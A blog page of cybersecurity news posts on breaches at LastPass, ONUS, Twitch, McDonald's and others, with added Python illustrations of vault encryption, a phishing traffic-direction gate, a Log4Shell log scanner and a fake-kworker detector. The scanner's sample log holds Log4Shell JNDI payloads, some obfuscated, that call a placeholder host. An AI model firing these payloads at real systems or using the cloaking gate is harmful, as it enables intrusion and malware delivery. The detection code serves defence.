Showing posts with label Customer Data.

Hackers Had Internal Access for 4 Days

Password management solution LastPass has confirmed that the company was hacked and that the attackers had access to its development systems for four days. The company said in a blog post that, about two weeks earlier, it had detected “unusual activity” in portions of its “LastPass development environment” and immediately launched an investigation. 

According to the company, the attackers likely gained access to some of its source code through “a single compromised developer account”. They compromised a developer's endpoint and used it to reach the development environment, impersonating the developer after he had “authenticated using multi-factor authentication”, which let them take some of the source code and “some proprietary LastPass technical information”. The company maintains that no user data was compromised in the incident.  

The company states that all of its “products and services are operating normally.” The investigation is still ongoing, and the company says it has “implemented additional enhanced security measures.” 

LastPass CEO Karim Toubba stated that “There is no evidence of any threat actor activity beyond the established timeline [...] there is no evidence that this incident involved any access to customer data or encrypted password vaults”. 

The company reiterated that, despite the unauthorized access, the attacker did not obtain any sensitive user data, crediting its system design and the zero trust access (ZTA) controls it has in place, which are intended to contain incidents of this kind. 

ZTA includes complete segregation of the Development and Production environments and the company's own inability to access any of its customers' password vaults without the master password set by the customer. “Without the master password, it is not possible for anyone other than the owner of a vault data,” the CEO stated. 
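As an added illustration (not LastPass code, and simplified relative to any real product), the following Python models the design point in the preceding paragraph: the key that encrypts the vault is derived on the client from the master password, and the server stores only a further one-way derivative for login, so a compromise of the service side yields encrypted blobs it cannot open. The iteration counts, the choice of the account email as salt and the HMAC-based toy stream cipher are assumptions made here for the example; production code would use a vetted AEAD such as AES-GCM.

```python
import hashlib
import hmac
import secrets

# Added illustration, not LastPass code. Work factor is an assumption for the example.
ITERATIONS = 100_000


def normalize_email(email: str) -> str:
    return email.strip().lower()


def derive_vault_key(master_password: str, email: str, iterations: int = ITERATIONS) -> bytes:
    """Runs on the client only. The normalised email is the salt, so two users with the
    same master password still get different keys. This key never leaves the client."""
    return hashlib.pbkdf2_hmac("sha256", master_password.encode(),
                               normalize_email(email).encode(), iterations, dklen=32)


def derive_login_hash(vault_key: bytes, master_password: str) -> bytes:
    """One more one-way step on top of the vault key. This is what the client sends to
    authenticate; knowing it does not give you the vault key."""
    return hashlib.pbkdf2_hmac("sha256", vault_key, master_password.encode(), 1, dklen=32)


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Toy counter-mode stream cipher built from HMAC-SHA256, for illustration only.
    Symmetric: the same call encrypts and decrypts. Use AES-GCM in real code."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        block = hmac.new(key, nonce + offset.to_bytes(4, "big"), hashlib.sha256).digest()
        out.extend(a ^ b for a, b in zip(data[offset:offset + 32], block))
    return bytes(out)


class VaultServer:
    """What the service side holds: a salted hash of the login hash, and the opaque blob.
    Neither the master password nor the vault key is ever present here."""

    def __init__(self):
        self.users = {}

    def register(self, email: str, login_hash: bytes, encrypted_vault: bytes) -> None:
        salt = secrets.token_bytes(16)
        stored = hashlib.pbkdf2_hmac("sha256", login_hash, salt, 10_000)
        self.users[email] = {"salt": salt, "login_check": stored, "vault": encrypted_vault}

    def login(self, email: str, login_hash: bytes) -> bool:
        rec = self.users.get(email)
        if rec is None:
            return False
        candidate = hashlib.pbkdf2_hmac("sha256", login_hash, rec["salt"], 10_000)
        return hmac.compare_digest(candidate, rec["login_check"])

    def fetch_vault(self, email: str) -> bytes:
        return self.users[email]["vault"]  # ciphertext only; useless without the client key


def client_store(server: VaultServer, email: str, master_password: str, plaintext: bytes) -> bytes:
    """Client flow: derive the key, encrypt locally, upload blob plus login hash. Returns the key."""
    email = normalize_email(email)
    vault_key = derive_vault_key(master_password, email)
    nonce = secrets.token_bytes(12)
    blob = nonce + keystream_xor(vault_key, nonce, plaintext)
    server.register(email, derive_login_hash(vault_key, master_password), blob)
    return vault_key


def client_open(server: VaultServer, email: str, master_password: str) -> bytes:
    """Client flow on another device: re-derive the key, authenticate, decrypt the blob."""
    email = normalize_email(email)
    vault_key = derive_vault_key(master_password, email)
    if not server.login(email, derive_login_hash(vault_key, master_password)):
        raise PermissionError("login rejected")
    blob = server.fetch_vault(email)
    return keystream_xor(vault_key, blob[:12], blob[12:])
```

The server-side record contains a salt, a hash of the login hash and the ciphertext, which is why an attacker who walks off with that record, as in the incident above, still has to brute-force the master password to read anything.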

Lastly, LastPass said it has retained the services of a leading cybersecurity firm to improve its source code security practices, and that it is deploying additional endpoint security guardrails in both the Development and Production environments to better detect and prevent attacks on its systems.

Russian Hackers Employ Malicious Traffic Direction Systems to Spread Malware



Researchers have found possible links between a subscription-based crimeware-as-a-service (CaaS) offering and a cracked copy of Cobalt Strike, which they suspect is being supplied to customers as a tool for staging post-exploitation operations. 

The offering, sold under the name Prometheus, should not be confused with the open-source Prometheus monitoring and alerting system for metrics-based cloud applications, which is used by nearly 800 cloud-native companies including Uber, Slack and Robinhood. 

That monitoring system gives a convenient view of a system's state, together with hardware and software metrics such as memory use, network utilization and application-defined metrics (for example, the number of failed login attempts to a web application), by scraping real-time data from numerous endpoints. Its maintainers have historically left built-in security features such as authentication and encryption out of the core project, on the grounds that the numeric metrics it collects are not sensitive data, which lets the project focus on monitoring functionality. It has no connection to the criminal service that shares its name. 

The Prometheus TDS, by contrast, is advertised on Russian underground forums as a traffic direction system (TDS) that performs bulk phishing redirection to rogue landing pages designed to deliver malware payloads to targeted computers, for $250 per month. 

"A system of a malicious technology, malicious email circulation, illicit folders across authorized platforms, traffic diversion, and the capacity to deliver infected files are the significant elements of Prometheus," the BlackBerry Research and Intelligence Team stated in a report. 

The redirection comes from one of two places: malicious advertisements on legitimate websites, or legitimate websites that have been tampered with to host harmful code. The attack chain begins with a spam email containing an HTML file or a link to a Google Docs page; when opened, it redirects the victim to a compromised website hosting a PHP backdoor, which fingerprints the machine to decide whether to serve the victim malware or redirect them to another page that may host a phishing scam.
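As an added example (not the Prometheus TDS's code, nor BlackBerry's), the Python below models the gatekeeping step the paragraph above describes: a visitor is fingerprinted and either handed the real payload or the phishing page, or quietly shown a decoy. The IP ranges, user-agent markers and target countries are constructed for the example. The point for an analyst is why a sandbox detonation or a replay from a research IP so often sees nothing.

```python
import ipaddress
from dataclasses import dataclass, field

# Added example. Deny-list, UA markers and targeting are all made up for illustration.
ANALYSIS_NETS = [ipaddress.ip_network("203.0.113.0/24"), ipaddress.ip_network("198.51.100.0/24")]
AUTOMATION_MARKERS = ("curl", "wget", "python-requests", "headlesschrome", "bot", "scanner", "urlscan")
TARGET_COUNTRIES = {"US", "GB", "DE"}


@dataclass
class Visit:
    ip: str
    user_agent: str
    country: str   # assumed to come from a GeoIP lookup in front of this logic


@dataclass
class Gate:
    """One TDS landing URL. Remembers who has already been served so replays see nothing."""
    served: set = field(default_factory=set)

    def decoy_reasons(self, v: Visit) -> list:
        """Every check the visitor fails; an empty list means they get the real content."""
        ip = ipaddress.ip_address(v.ip)
        ua = v.user_agent.lower()
        reasons = []
        if any(ip in net for net in ANALYSIS_NETS):
            reasons.append("source IP in a known analysis/sandbox range")
        if not ua or any(m in ua for m in AUTOMATION_MARKERS):
            reasons.append("user-agent looks automated")
        if v.country not in TARGET_COUNTRIES:
            reasons.append("country outside campaign targeting")
        if v.ip in self.served:
            reasons.append("IP already served once (replay)")
        return reasons

    def route(self, v: Visit) -> str:
        """Returns 'decoy', 'payload' or 'phish': the page this visitor would receive."""
        if self.decoy_reasons(v):
            return "decoy"
        self.served.add(v.ip)          # one shot per IP: the next visit gets the decoy
        if "windows" in v.user_agent.lower():
            return "payload"           # Windows browser: serve the malware dropper
        return "phish"                 # anything else: credential phishing page
```

When reproducing a redirect chain, fetch from a fresh, non-datacentre IP, with the victim's exact User-Agent and geography, and assume the first request is the only one that will return the real content.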

While TDSs aren't a novel concept, the level of sophistication, the support on offer and the low cost lend weight to the hypothesis that this is a trend likely to grow in the threat landscape in the near future, the researchers wrote.

Separately, anyone running the unrelated Prometheus monitoring system should check whether its metrics endpoints were reachable without authentication during the period before native TLS and basic authentication support were added, to determine whether any sensitive data was exposed.

VPNLab.net Service was Seized Because it was Used by Criminals to Spread Ransomware

 

Following a coordinated worldwide police investigation, a VPN service used by criminals to spread ransomware, malware, and facilitate other forms of cybercrime has been knocked offline. The 15 servers used by the VPNLab.net service have been seized or disrupted as part of a combined operation by Europol, Germany's Hanover Police Department, the FBI, the UK's National Crime Agency (NCA), and others. 

According to Europol, VPNLab.net was founded in 2008 and provided services based on OpenVPN technology and 2048-bit encryption to give online anonymity for as little as $60 per year. The service also offered a double VPN, with servers located in a variety of countries. "This made VPNLab.net a popular choice for cybercriminals, who could use its services to carry on committing their crimes without fear of detection by authorities," the agency said. 

According to Europol, several investigations have revealed criminals using the VPNLab.net service to enable illegal operations such as malware distribution. Other cases showed the service being used to set up infrastructure and communications for ransomware operations, as well as for the actual deployment of malware. Now that the servers have been seized, law enforcement is reviewing customer data in an attempt to identify cybercriminals and the victims of their attacks.

The vpnlab.net domain presently shows a notice telling visitors that it has been seized by law enforcement. According to the statement, authorities obtained customer data held on the confiscated servers, and an inquiry has been initiated. Europol has not revealed which types of malware and ransomware were distributed using the VPN provider. As a consequence of the investigation, more than 100 organizations have been identified as being at risk of cyberattacks, and law enforcement is collaborating with them to mitigate any possible compromise. 

"The actions carried out under this investigation make clear that criminals are running out of ways to hide their tracks online," said Edvardas Šileris, head of Europol's European Cybercrime Centre (EC3). "Each investigation we undertake informs the next, and the information gained on potential victims means we may have pre-empted several serious cyberattacks and data breaches," he added. 

On January 17, 2022, authorities from Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the United States, and the United Kingdom joined forces to disrupt VPNLab, with assistance from Europol.

FinTech Company Struck by Log4j Says "No" to Paying the Ransom

 

ONUS, one of the largest Vietnamese crypto trading platforms, was recently hit by a cyberattack. Hackers aimed for the company's payment system, which was running a vulnerable version of Log4j. 

Following the cyberattack, extortion began, with the hackers reportedly demanding a $5 million ransom from the company under threat of publishing user data. According to BleepingComputer, the company refused to pay, and as a result information on nearly 2 million ONUS users showed up for sale on forums. 

Around December 9, a proof-of-concept (PoC) exploit for the Log4j vulnerability CVE-2021-44228, better known as Log4Shell and at the time making headlines, appeared on GitHub. Threat actors have exploited it widely since. ONUS's Cyclos server, which ran a version of Log4j vulnerable to Log4Shell, was one of their targets. 

Between December 11 and December 13, the hackers successfully exploited it and installed backdoors to maintain their access. On December 13, a Cyclos alert reportedly told ONUS that its systems needed patching; the Cyclos instance was patched, but by then the response came too late, and the threat actors had already had ample time to steal important data. According to BleepingComputer, the databases held nearly 2 million customer records, including E-KYC (electronic Know Your Customer) information, hashed passwords and personal information. It is worth noting that the Log4Shell flaw was exploited on a sandbox server used "for programming purposes only." 
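The attack window described above is the kind of thing the web and application logs of the period can confirm. As an added example (not ONUS's, CyStack's or BleepingComputer's code), the Python below flags the JNDI lookup strings used to trigger CVE-2021-44228, unwinding the nested-lookup and URL-encoding tricks attackers used to dodge naive `${jndi:` matching, and runs over a few constructed access-log lines (the addresses and paths are made up).

```python
import re
from urllib.parse import unquote

# Added detection example, not ONUS's, CyStack's or BleepingComputer's code.

INNER = re.compile(r"\$\{([^{}]*)\}")          # an innermost ${...} lookup
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_inner(expr: str) -> str:
    """Collapse one innermost lookup the way Log4j's substitutor would, for the
    obfuscations seen in the wild: ${::-j} and ${env:X:-j} give the default 'j',
    ${lower:J} gives 'j', ${upper:j} gives 'J'. Unknown lookups keep their text."""
    if ":-" in expr:
        return expr.rsplit(":-", 1)[1]
    head, _, rest = expr.partition(":")
    if head.strip().lower() == "lower":
        return rest.lower()
    if head.strip().lower() == "upper":
        return rest.upper()
    return expr


def normalize(value: str, max_rounds: int = 32) -> str:
    """URL-decode, then unwind nested lookups from the inside out until a jndi: lookup
    surfaces (kept intact so it can be matched) or nothing is left to unwind."""
    s = unquote(value)
    for _ in range(max_rounds):
        m = INNER.search(s)
        if not m:
            break
        if m.group(1).lstrip().lower().startswith("jndi"):
            return s
        s = s[:m.start()] + resolve_inner(m.group(1)) + s[m.end():]
    return s


def is_log4shell_probe(value: str) -> bool:
    return JNDI.search(normalize(value)) is not None


# Constructed access-log lines (addresses and paths made up): one benign request, then
# a plain probe in the User-Agent, a nested-lookup one in the query string, and a
# URL-encoded one.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET /api/v1/login HTTP/1.1" 200 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Dec/2021:03:14:09 +0000] "GET /api/v1/login HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [11/Dec/2021:03:14:10 +0000] "GET /?q=${${lower:j}ndi:rmi://198.51.100.7:1099/b} HTTP/1.1" 404 "-" "curl/7.68.0"
10.0.0.9 - - [11/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 "-" "%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2F198.51.100.7%2Fc%7D"
"""


def scan(log_text: str) -> list:
    """Return (line number, source IP) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if is_log4shell_probe(line):
            hits.append((n, line.split()[0]))
    return hits
```

A hit only proves a probe arrived; whether it fired depends on the outbound LDAP/RMI connections from the Java host at that moment, which is the next thing to pull from the egress logs.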

The hackers nevertheless reached other storage, including Amazon S3 buckets holding production data, because of a system misconfiguration. They reportedly demanded a $5 million ransom from ONUS, which the company refused; instead it chose to inform customers about the attack through a closed Facebook group. 

Chien Tran, the CEO from ONUS declared that “As a company that puts safety first, we are committed to providing our customers with transparency and integrity in business operations. (…) That is why, after careful consideration, the right thing we need to do now is to inform the entire ONUS community about this incident.” 

According to an ONUS announcement on the subject, hackers were able to obtain the following consumer data from the fintech firm: 
• Name, phone number, and email address; 
• Address; 
• KYC data (the identification documents and proofs that fintech companies collect from customers, along with a “video selfie” used for automated checks); 
• Encrypted history; 
• Transaction history; 
• Other encrypted data. 

The Misconfiguration in the Amazon S3 Buckets 

Besides Log4j, which facilitated an entry for the threat actors, there was another issue too with ONUS’ Amazon S3 buckets linked to improper access control. CyStack started an investigation on the incident and published their report with details about the cyberattack and the backdoor the hackers managed to plant on the impacted system.

“During monitoring, CyStack – ONUS’s security partner, detected and reported a cyberattack on ONUS system to us. The hacker took advantage of a vulnerability in a set of libraries on the ONUS system to get into the sandbox server (for programming purposes only). However, due to a configuration problem, this server contains information that gave bad guys access to our data storage system (Amazon S3) and stole some essential data.” 

“Also on these servers, ONUS had a script to periodically back up the database to S3 which contained the database hostname and username/password as well as backup SQL files. As a consequence, the attackers could access the ONUS database to get user information. (…) To facilitate access, the attackers downloaded and ran a backdoor on the server. This backdoor was named kworker for the purpose of disguising as the Linux operating system’s kworker service. (…) The kworker backdoor obtained was written in Golang 1.17.2 and built for Linux x64. It was used as a tunnel connecting the C&C server and the compromised server via SSH protocol (a wise way to avoid detection!).” 
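The report's note that the backdoor was named kworker to blend in with the Linux kernel's worker threads describes a check a responder can automate. As an added example (not CyStack's or ONUS's code), the Python below reads /proc on a Linux host and flags any process that names itself like a kernel thread but has properties no kernel thread has: an executable path, a command line, or a parent other than kthreadd (PID 2). The process records used to exercise it are constructed.

```python
import os
from dataclasses import dataclass

# Added example, not CyStack's or ONUS's code. Linux-only: it reads /proc.


@dataclass
class Proc:
    pid: int
    name: str       # comm, as in /proc/<pid>/status "Name:"
    ppid: int
    exe: str        # "" when /proc/<pid>/exe cannot be resolved, as for kernel threads
    cmdline: str    # "" for kernel threads


def read_procs() -> list:
    """Collect the fields above for every visible process."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/status") as fh:
                fields = dict(line.split(":", 1) for line in fh if ":" in line)
            name = fields["Name"].strip()
            ppid = int(fields["PPid"].strip())
            try:
                exe = os.readlink(f"/proc/{pid}/exe")
            except OSError:
                exe = ""
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except (OSError, KeyError, ValueError):
            continue   # exited mid-read, or not readable by this user
        procs.append(Proc(pid, name, ppid, exe, cmdline))
    return procs


KERNEL_THREAD_PREFIXES = ("kworker", "ksoftirqd", "kthreadd", "migration/", "rcu_", "kswapd", "kcompactd")
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def suspicious(p: Proc) -> list:
    """Reasons a process named like a kernel thread looks like a userland binary.
    Genuine kernel threads have no exe link, no command line and PPID 2 (kthreadd)."""
    if not p.name.startswith(KERNEL_THREAD_PREFIXES):
        return []
    reasons = []
    if p.exe:
        reasons.append(f"has an executable: {p.exe}")
    if p.cmdline:
        reasons.append(f"has a command line: {p.cmdline!r}")
    if p.ppid not in (0, 2):
        reasons.append(f"parent is PID {p.ppid}, not kthreadd")
    if p.exe.startswith(SUSPECT_DIRS) or p.exe.endswith(" (deleted)"):
        reasons.append("binary lives in a temp directory or was deleted after launch")
    return reasons


def find_impostors(procs) -> dict:
    """Map of PID -> reasons for every process that fails the kernel-thread checks."""
    return {p.pid: r for p in procs if (r := suspicious(p))}


if __name__ == "__main__":
    for pid, reasons in find_impostors(read_procs()).items():
        print(pid, "; ".join(reasons))
```

Run it as root so every process's exe link is readable. A real kernel thread shows up as, say, kworker/u8:1 with no exe and an empty cmdline; a Go binary dropped as ./kworker fails every one of those checks. Follow up on any flagged PID with its outbound connections (ss -tnp), since the report says this one tunnelled to its C&C over SSH.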

According to BleepingComputer, because the company declined to pay the ransom, customer data was up for sale on a data breach marketplace by December 25. The hackers claim to have 395 copies of the ONUS database tables, containing personal information and hashed passwords. 

CyStack advised ONUS to patch Log4j, revoke any exposed AWS credentials and configure AWS access rights properly, and recommended that public access to critical S3 buckets be blocked. Users should upgrade to Log4j 2.17.1, the current release at the time, as soon as possible. ONUS also stated that none of its assets were harmed and that its team has been working with security specialists to identify and address flaws. 

The company's asset management and storage system, ONUS Custody, was also improved. In the event of asset loss, the company says the ONUS Protection Fund would cover it.

McMenamins Struck by Ransomware Attack, Employee Data at Risk

 

McMenamins, a Portland hotel and brewpub chain, was struck by a ransomware attack on Wednesday that may have exposed employees' personal information, although no customer payment information appears to have been compromised. 

The ransomware attack was discovered and stopped on December 12, according to McMenamins. The company stated it alerted the FBI and contacted a cybersecurity firm to figure out where the attack came from and how extensive it was. 

Employee data such as names, addresses, dates of birth, Social Security numbers, direct deposit bank account information and benefits records may have been acquired, the company said in a news release, but "it is not currently known whether that is the case." 

"To provide employees with peace of mind, McMenamins will be offering employees identity and credit protection services, as well as a dedicated helpline through Experian," the company stated. "A payment processing service manages the collection of such information. Further, this information is not stored on company computer systems impacted by the attack."  

Many operational systems have been taken offline, including credit card scanners, necessitating temporary changes to payment procedures at some McMenamins sites. There is "no indication" that customer payment data has been compromised, according to the company. 

The co-owner, Brian McMenamin stated, “What makes this breach especially disheartening is that it further adds to the strain and hardship our employees have been through in the past two years.” 

“We ask that our customers give our employees extra grace as we make temporary adjustments in the way we process transactions and reservations, given the impacts to our systems by this breach.” 

The company said it is unclear when the problem will be resolved and systems restored. There are a few things businesses can do to help mitigate these attacks, according to Kerry Tomlinson, a cyber news reporter with Ampere News. 

"As a business, you need to have backups," Tomlinson said. "If ransomware hits and they're demanding ransom for you to get your files back, you can say thanks a lot but I already have backups." 

"It will happen more and more and it's only going to get bigger. If you're not paying attention now, you need to pay attention." 

Employees should be especially cautious to help prevent cyber assaults, according to Tomlinson, by avoiding questionable emails, setting unique passwords for each website visited, and adding a multi-factor authentication process to offer an extra layer of security. It is worth noting that despite the breach, all McMenamins locations are open.

Panasonic Suffers Data Breach After Network Hack

 

Panasonic, a Japanese multinational giant, revealed a security breach this month after unidentified threat actors got access to computers on its network. 

The company stated in a press release issued Friday, "Panasonic Corporation has confirmed that its network was illegally accessed by a third party on November 11, 2021. As the result of an internal investigation, it was determined that some data on a file server had been accessed during the intrusion." 

Panasonic has reported the issue to the appropriate authorities and has taken steps to restrict external servers from accessing its network. The Japanese electronics behemoth has also recruited a third party to examine the attack, which Panasonic described as a "leak" in a press release, and determine whether any of the data acquired during the hack included customer personal information. 

"In addition to conducting its own investigation, Panasonic is currently working with a specialist third-party organization to investigate the leak and determine if the breach involved customers' personal information and/or sensitive information related to social infrastructure," the company added. 

When approached by BleepingComputer, a Panasonic official was not immediately available for comment. 

"Panasonic would like to express its sincerest apologies for any concern or inconvenience resulting from this incident", said the organization. 

In June, Panasonic servers were reportedly hacked

While the press statement does not include many specifics about the attack timeframe, Japanese media sites such as Mainichi and NHK stated that the attackers gained access to Panasonic's systems between June and November, as originally reported by The Record. 

Furthermore, they had access to critical customer and employee data until Panasonic discovered the illicit activity on November 11. The attack on Panasonic's servers is the latest in a long line of incidents affecting Japanese corporations in recent years. 

Security incidents and, in some circumstances, data breaches have also been reported by Kawasaki, NEC, Mitsubishi Electric, and defence contractors Kobe Steel and Pasco.

Amazon's Twitch Blames Server Error for Massive Data Leak

 

Twitch disclosed a massive data breach on Wednesday, attributing it to an "error in a Twitch server configuration change" that exposed certain data to the internet. 

The purportedly stolen material includes the source code for Amazon's streaming platform, reports on creator payments, and information about an unannounced Steam competitor from Amazon Game Studios. Twitch acknowledged the incident in a tweet on Wednesday, saying it would provide further information in a blog post later and that it is still trying to determine the full scope of the event. 

The company wrote, "We have learned that some data was exposed to the internet due to an error in a Twitch server configuration change that was subsequently accessed by a malicious third party." 

"Our teams are working with urgency to investigate the incident." 

Twitch said there's no indication that login credentials were exposed. The streaming platform also said, "full credit card numbers are not stored by Twitch, so full credit card numbers were not exposed." 

Twitch's brief statement suggests the company is in full crisis mode. IT professionals and security specialists are still trying to gauge the severity of the breach. The cause given is a "server configuration" error: in other words, someone misconfigured the systems holding Twitch's sensitive data so that outsiders could find and download it. 

The company has not yet said when the error occurred. Some of the stolen data dates back three years, so the systems may have been exposed for a long time, or the error could have left the door open for only a few days or weeks. Attackers constantly scan the internet for open databases, or someone may have tipped them off about the internal IT mistake. 

Making these types of blunders, however, is costly, especially when the target is as large as Twitch. Numerous streamers informed BBC News that the payment data was correct for their own earnings and this poses issues for the firm. Candid Wuest from cyber-security company Acronis stated, "A lot more damage is now in store for Twitch. The breach is already harming Twitch on all the fronts that count." 

The leaked data "could contain nearly the full digital footprint of Twitch, making it one of the most severe data breaches of late." "Releasing payout reports for streaming clients will not make the influencers happy either," Mr. Wuest added. 

The download released online is also labeled "part one," implying that there may be more data to be published on the internet.

Elastic Stack API Security Vulnerability Exposes Customer and System Data

 

The mis-implementation of Elastic Stack, a collection of open-source products that employ APIs for crucial data aggregation, search, and analytics capabilities, has resulted in severe vulnerabilities, according to a new analysis. Researchers from Salt Security uncovered flaws that allowed them to not only conduct attacks in which any user could extract critical customer and system data, but also to create a denial of service condition in which the system would become inaccessible. 

“Our latest API security research underscores how prevalent and potentially dangerous API vulnerabilities are. Elastic Stack is widely used and secure, but Salt Labs observed the same architectural design mistakes in almost every environment that uses it,” said Roey Eliyahu, co-founder and CEO, Salt Security. “The Elastic Stack API vulnerability can lead to the exposure of sensitive data that can be used to perpetuate serious fraud and abuse, creating substantial business risk.” 

The vulnerability was originally detected while safeguarding one of their customers, a huge online business-to-consumer platform that provides API-based mobile applications and software as a service to millions of consumers around the world, according to the researchers. 

Officials at Salt Security were eager to point out that this isn't a flaw in Elastic Stack itself, but rather a problem with how it's being deployed. According to Salt Security's technical evangelist Michael Isbitski, the vulnerability isn't due to a fault in Elastic's software, but rather to "a common risky implementation set up by users." 

"The lack of awareness around potential misconfigurations, mis-implementations, and cluster exposures is largely a community issue that can be solved only through research and education," Isbitski said. API threats have increased 348% in the last six months, according to the Salt Security State of API Security Report, Q3 2021. The development of business-critical APIs, combined with the advent of exploitable vulnerabilities, reveals the substantial security flaws that occur from the integration of third-party apps and services.

The impact of the Elastic Stack design implementation flaws rises considerably when an attacker chains together multiple attacks, according to Salt Labs researchers. Attackers can use the lack of authorization between front-end and back-end services to establish a working user account with basic permission levels, then make educated assumptions about the schema of back-end data stores and inquire for data they aren't authorized to access. 

Salt Labs was able to gain access to a large amount of sensitive data, including account numbers and transaction confirmation numbers, as part of its research. Some of the sensitive information was also private and subject to GDPR regulations. Attackers could use this information to access other API-based features, such as the ability to book new services or cancel existing ones.

Thailand's Data on 106 Million Visitors has been Breached

 

After uncovering an unsecured database holding the personal information of millions of visitors to Thailand, a British cybersecurity researcher unexpectedly found his own personal data among it. Bob Diachenko, a cybersecurity researcher and security lead at Comparitech, discovered an unencrypted Elasticsearch server exposing the personal data of approximately 106 million international travellers to Thailand. The data sat in an unsecured database reachable online, so anyone could access it. 

Threat actors constantly scan for unprotected servers. There is no evidence of how long the database was exposed before Diachenko's disclosure. After it was secured, however, a honeypot was put in its place to monitor intrusion attempts.

“Notably, the IP address of the database is still public, but the database itself has been replaced with a honeypot. Anyone who attempts access at that address now receives the message: This is honeypot, all access were logged,” Diachenko added. 

A honeypot is a decoy system used to detect or study unauthorized access attempts. Comparitech had earlier run its own experiment to measure how quickly attackers find an exposed Elasticsearch server, leaving a dummy database with fake data open from May 11 until May 22, 2020. It logged 175 attacks in that window, the first of them within eight hours of the server going live, and as many as 22 attacks in a single day. 

After he reported the problem to Thai authorities, the database was safeguarded. According to Diachenko, every visitor who visited Thailand in the last ten years may have had their personal information exposed as a result of the event. Over 200GB of user data was stored in the database. Date of arrival in Thailand, full name, sex, passport number, residency status, visa type, and Thai arrival card number were among the data disclosed. 

“Any foreigner who traveled to Thailand in the last decade or so probably has a record in the database. There are many people who would prefer their travel history and residency status not be publicized, so for them there are obvious privacy issues. None of the information exposed poses a direct financial threat to the majority of data subjects,” Diachenko stated. 

“No financial or contact information was included. Although passport numbers are unique to individuals, they are assigned sequentially and are not particularly sensitive,” Diachenko added.

McDonald’s Password for the Monopoly VIP Database Leaked

 

The fast-food chain McDonald's mistakenly sent out emails with login credentials associated with a database for its Monopoly VIP game. 

McDonald's UK had to postpone the popular Monopoly VIP game for a year because of the COVID-19 pandemic, reintroducing it on August 25th this year. 

McDonald's Monopoly is a well-known marketing gimmick in which customers can win gifts and money by entering codes found on purchases. Basically, every time a person purchases a meal from a McDonald's restaurant, they have a chance to win a gift. 

Unfortunately, the game hit a snag over the weekend when a bug caused prize redemption emails sent to winners to include the usernames and passwords for the production and staging database servers. 

Troy Hunt shared with BleepingComputer a screenshot of the exception error contained in an email sent to prize winners, which exposed sensitive details of the web application. 

The email sent to a Monopoly VIP winner contained hostnames for Azure SQL databases along with the databases' login names and passwords. The prize winner who shared the email with Troy Hunt said the production server was firewalled off, but that the staging server could be reached with the leaked credentials. 

The person informed Troy Hunt in an email published with BleepingComputer, "I tried to connect to production to gauge the severity of the issue and whether or not getting in touch was an urgent matter but luckily for them they had a set of firewall rules setup. I did however gain access to staging, which I disconnected from immediately for obvious reasons." 

Since these databases may have contained winning prize codes, an unethical individual could have obtained unused game codes and used them to claim the rewards. 
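As an added example (not McDonald's or the game's code), the Python below reproduces the class of bug: a catch-all handler that renders the exception text, connection string included, into a customer-facing message. Beside it is the usual fix: log the detail internally under a correlation reference, redact connection-string components before they cross a trust boundary, and send the customer only a generic message with the reference. The connection string, host and credentials are made up; the key=value;... layout is the common ADO.NET/SQL Server style.

```python
import logging
import re
import uuid

# Added example, not McDonald's or the game's code. The connection string, host and
# credentials are made up; the key=value;... layout is the usual ADO.NET style.
CONN = ("Server=tcp:example-sql.database.windows.net,1433;Database=monopoly;"
        "User ID=appuser;Password=Sup3rSecret!;Encrypt=True;")


class DbError(Exception):
    pass


def fetch_prize(code: str) -> str:
    """Stand-in for the data layer: fails the way a driver does, quoting its connection
    string in the exception text. Constructed for the example."""
    raise DbError(f"Login failed while connecting with '{CONN}' (prize code {code})")


def render_email_vulnerable(code: str) -> str:
    """The bug class: a catch-all that echoes the exception into the customer email."""
    try:
        return f"Congratulations, you won {fetch_prize(code)}!"
    except Exception as exc:
        return f"Sorry, something went wrong: {exc}"


SECRET_PARTS = re.compile(r"(?i)\b(password|pwd|user id|uid|server|data source)\s*=\s*[^;]*")


def redact(text: str) -> str:
    """Blank out connection-string components before text crosses a trust boundary."""
    return SECRET_PARTS.sub(lambda m: m.group(1) + "=[REDACTED]", text)


def render_email_hardened(code: str, log: logging.Logger = logging.getLogger("prize")) -> str:
    """The fix: detail goes to the internal log (still redacted) under a reference id;
    the customer gets a generic message carrying only that reference."""
    try:
        return f"Congratulations, you won {fetch_prize(code)}!"
    except Exception as exc:
        ref = uuid.uuid4().hex[:8]
        log.error("prize lookup failed ref=%s code=%s err=%s", ref, code, redact(str(exc)))
        return f"Sorry, we could not process your prize right now. Reference: {ref}"
```

The redaction is a backstop, not the primary control: the stronger fix is for the application to hold its connection string outside the code path that formats errors at all, so there is nothing to leak when a driver quotes its configuration.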

Luckily for McDonald's, the individual responsibly reported the problem to the company. They received no reply, but later found that the staging server's password had been changed. 

This individual was not alone: several people said they had seen the credentials, and some even recorded their experience on TikTok. 

McDonald's told BleepingComputer that only the staging server's credentials were exposed, although the error message clearly contained the credentials for both a production and a staging server.

In a statement, McDonald's told BleepingComputer, "Due to an administrative error, a small number of customers received details for a staging website by email. No personal details were compromised or shared with other parties." 

"Those affected will be contacted to reassure them that this was a human error and that their information remains safe. We take data privacy very seriously and apologize for any undue concern this error has caused.”

Hackers Target American Retail Investors, FINRA Warns Brokerage Firms

 

Alongside the cyberattacks hitting American corporations, American retail investors are also fighting a rise in hackers breaking into their accounts and investments. FINRA (the Financial Industry Regulatory Authority), the securities industry's self-regulatory body, said in a recent notice that it has received several complaints of customer accounts being hacked. The incidents involved attackers using stolen customer information, such as login credentials, to break into customers' online brokerage accounts. 

